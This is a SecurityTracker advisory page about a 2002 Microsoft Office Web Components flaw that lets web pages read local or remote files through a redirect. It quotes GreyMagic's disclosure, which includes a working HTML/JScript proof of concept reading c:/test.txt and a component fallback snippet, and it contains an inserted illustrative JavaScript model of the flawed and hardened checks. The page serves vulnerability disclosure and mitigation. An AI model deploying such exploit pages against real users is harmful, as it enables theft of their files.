SecurityTracker.com

Category:   Application (Game)  >   Microsoft Office
Vendors:   Microsoft
Microsoft Office Web Components Let Remote Users Write Code to Run in the Victim's Local Security Domain and Access Local or Remote Files
SecurityTracker Alert ID:  1004000
SecurityTracker URL:  http://securitytracker.com/id/1004000
CVE Reference:   CAN2002-0860
Date:  Apr 9 2002
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): Office 2000 Office Web Components 9 Spreadsheet component, Office XP Office Web Components 10 Spreadsheet component
Description:   GreyMagic Software has issued several advisories warning of scripting vulnerabilities in Microsoft Office due to flaws in Microsoft's Office Web Components. In this advisory, they indicate that remotely supplied HTML can cause Internet Explorer to read local files.

Several vulnerabilities were reported in Microsoft's Office Web Components (OWC), which is included in Microsoft Office but is also available as a standalone viewer. OWC is reported to be a group of components marked as 'safe for scripting' and used to enrich HTML documents with spreadsheets, charts, pivot tables and more.

A remote user can apparently exploit OWC9 and OWC10 to cause IE to read any local or remote file via the "LoadText" method of the Range object. If the URL supplied to this method is not in the same security domain as the current document, the function apparently returns an error. However, a user can reportedly bypass this restriction by using a URL that will redirect to the desired local or remote file. OWC will then interpret the URL as safe to load and will load the contents of the file into the spreadsheet, according to the advisory.
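
The flaw class described above (a domain check applied to the requested URL but not to where a redirect leads) is modelled below as an added example; it is not code from the advisory or from Microsoft. The host site.example, the REDIRECTS table and the function names are assumptions made for illustration, and no network or file access takes place.

```javascript
// Constructed stand-in for server redirect responses (assumption, not real traffic).
// "getFile.asp" and c:/test.txt mirror the names used in the advisory's example.
const REDIRECTS = {
  "http://site.example/getFile.asp": "file:///c:/test.txt",
  "http://site.example/a": "http://site.example/b",
};
const MAX_HOPS = 5;

// Security domain modelled as scheme + host + port; file: is its own domain.
function domainOf(url) {
  const u = new URL(url);
  return u.protocol === "file:" ? "file:" : `${u.protocol}//${u.host}`;
}

function sameDomain(docUrl, target) {
  return domainOf(docUrl) === domainOf(new URL(target, docUrl).href);
}

// Flawed pattern: validate the URL as supplied, then follow redirects unchecked.
function loadCheckedOnce(docUrl, target) {
  let url = new URL(target, docUrl).href;
  if (!sameDomain(docUrl, url)) throw new Error("cross-domain: " + url);
  for (let i = 0; i < MAX_HOPS && REDIRECTS[url]; i++) {
    url = new URL(REDIRECTS[url], url).href;
  }
  return url; // location whose contents would end up in the caller's hands
}

// Hardened pattern: every hop, including the final one, must pass the check.
function loadCheckedPerHop(docUrl, target) {
  let url = new URL(target, docUrl).href;
  for (let i = 0; i <= MAX_HOPS; i++) {
    if (!sameDomain(docUrl, url)) throw new Error("cross-domain: " + url);
    if (!REDIRECTS[url]) return url;
    url = new URL(REDIRECTS[url], url).href;
  }
  throw new Error("too many redirects");
}

// Returns true when the per-hop loader rejects the request.
function isBlocked(docUrl, target) {
  try { loadCheckedPerHop(docUrl, target); return false; }
  catch (e) { return true; }
}
```

The per-hop loader still permits same-domain redirects, so only the cross-domain hop is refused.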

A demonstration exploit is provided in the Source Message.

The vendor has reportedly been notified.

For more information, see:

http://security.greymagic.com/adv/gm006-ie/

Impact:   A remote user can create HTML containing code that will, when loaded by the target (victim) user, run in the local user security context and be able to retrieve local or remote files.
Solution:   No solution was available at the time of this entry.

The author of the report has provided the following recommendation:

"Set 'Run ActiveX controls and plug-ins' to 'Disable' or simply remove/disable OWC until a patch becomes available."

Also, according to NTBugtraq, IE 6.0 provides the administrator with the ability to create lists of administrator-approved ActiveX controls. A user with 'Administrator' privileges can apparently restrict which controls can be scripted.

Vendor URL:  www.microsoft.com/technet/security/
Cause:   Access control error
Underlying OS:  Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Microsoft Issues Fix for OWC) Microsoft Office Web Components Let Remote Users Write Code to Run in the Victim's Local Security Domain and Access Local or Remote Files
The vendor has released a fix for OWC.



 Source Message Contents

Subject:  Reading local files with OWC in IE (GM#006-IE)


GreyMagic Security Advisory GM#006-IE
=====================================

By GreyMagic Software, Israel.
08 Apr 2002.

Available in HTML format at http://security.greymagic.com/adv/gm006-ie/.

Topic: Reading local files with OWC in IE.

Discovery date: 24 Feb 2002.

Affected applications:
======================

* Office 2000 - Office Web Components 9, Spreadsheet component.
* Office XP - Office Web Components 10, Spreadsheet component.


Introduction:
=============

Office Web Components (OWC) is a group of safe for scripting components used
to enrich HTML documents with Spreadsheets, Charts, Pivot tables and more.

OWC ships with the Microsoft Office package, but it is also downloadable as
a separate (free for viewing only) component.


Discussion:
===========

Using the Spreadsheet component in both OWC9 and OWC10, it is possible to
read any local or remote file.

The "LoadText" method of the Range object takes a URL as its first argument;
it throws an error if the URL supplied is not in the same domain as the
current document.

However, this protection can be easily bypassed by supplying a URL that will
redirect to the desired local or remote file.

OWC is fooled into thinking that the URL is safe and loads the contents of the
file into the spreadsheet; it is then trivial to retrieve the content and
transfer it to the server or use it in malicious ways.


Exploit:
========

This example reads the contents of the file "c:/test.txt", the URL
"getFile.asp" is redirecting to "file://c:/test.txt", allowing us to access
it:

<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP"
style="display:none"></object>
<script language="jscript">
onload=function () {
    try {
        // Load file into spreadsheet
        oSP.ActiveSheet.UsedRange.LoadText("getFile.asp");

        // Read the spreadsheet
        var oRng=oSP.ActiveSheet.UsedRange,
            iRows=oRng.Rows.Count,
            iCols=oRng.Columns.Count,
            sRes="";

        for (var iCRow=1;iCRow<=iRows;iCRow++) {
            for (var iCCol=1;iCCol<=iCols;iCCol++) {
                sRes+=(oSP.Cells(iCRow,iCCol).Value || "")+"\t";
            }
            sRes+="\n";
        }

        // Display result
        alert(sRes);
    }
    catch (oErr) {
        // Failed
        alert("File not found.");
    }
}
</script>

The class id of the <object> element above is for the spreadsheet component
of OWC9 (Microsoft Office 2000), OWC10's class id is
"0002E551-0000-0000-C000-000000000046", no further changes in code are
needed.

An attacker can actually use the fallback feature of the <object> element to
include either one of these components:

<!-- Try to include OWC10 -->
<object classid="clsid:0002E551-0000-0000-C000-000000000046" id="oSP10"
style="display:none">
    <!-- Failed, try to include OWC9 -->
    <object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP9"
style="display:none">
        <!-- None found -->
        Failed to load any of the spreadsheet components.
    </object>
</object>


Solution:
=========

Set "Run ActiveX controls and plug-ins" to "Disable" or simply
remove/disable OWC until a patch becomes available.

Microsoft has been informed, they have opened an investigation regarding
this issue.


Tested on:
==========

IE5sp2 NT4 sp6a + Office 2000 (OWC9), all patches.
IE5.5sp2 NT4 sp6a + Office 2000 (OWC9), all patches.
IE5.5sp2 NT4 sp6a + OWC10, all patches.
IE6 Win2000 + Office 2000 (OWC9), all patches.
IE6 WinXP + Office XP (OWC10), all patches.


Demonstration:
==============

A fully dynamic proof-of-concept demonstration of this issue is available at
http://security.greymagic.com/adv/gm006-ie/.


Feedback:
=========

Please mail any questions or comments to security@greymagic.com.

- Copyright 2002 GreyMagic Software.


 
 



Copyright 2019, SecurityGlobal.net LLC